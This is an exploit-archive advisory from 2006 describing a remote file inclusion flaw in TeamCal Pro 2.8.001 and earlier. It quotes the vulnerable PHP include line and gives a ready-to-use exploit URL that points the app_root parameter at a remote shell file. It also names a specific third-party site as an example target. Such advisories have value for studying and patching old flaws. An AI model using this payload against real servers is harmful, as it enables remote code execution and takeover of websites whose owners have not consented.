TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability
# Published : 2006-09-14
# Author : PSYCH@
# Previous Title : Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability
# Next Title : Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability

#########################################################################
#Author:PSYCH@  psych0path@hackermail.com
#
#                                                            
#########################################################################
#TeamCal Pro 2.8.001 (app_root) Remote file inclusion Vulnerabilities
#Demo: www.lewe.com/tcpro/
#
#########################################################################
#Code:
#
#include( $tc_config['app_root']."includes/footer.html.inc.php" );
#
#########################################################################
#Exploit
#
#http://site.com/path/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#Example:www.teamcounter.com/tcpro/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#########################################################################
#Thnx:Warhack & mAfiAcarLEs & DarkXBoyZ
#
#
#########################################################################

# www.Syue.com [2006-09-14]